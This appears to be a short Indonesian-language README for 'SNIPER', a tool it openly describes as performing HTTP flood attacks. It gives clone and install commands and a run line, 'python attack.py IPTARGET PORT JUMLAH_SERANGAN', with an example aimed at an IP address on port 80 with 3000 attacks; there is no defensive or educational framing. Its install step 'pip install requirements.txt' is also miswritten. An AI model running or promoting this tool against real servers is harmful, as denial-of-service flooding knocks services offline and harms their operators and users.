Apa itu SNIPER?
Tool untuk melakukan HTTP Flood.
INSTALL
$ git clone https://github.com/wendev89/sniper.git
$ cd sniper
$ pip install requirements.txt
Masalah "pip command not found" itu artinya pip belum diinstall
$ apt install python-pip
RUN
$ python attack.py IPTARGET PORT JUMLAH_SERANGAN
CONTOH
$ python attack.py 123.45.67.89 80 3000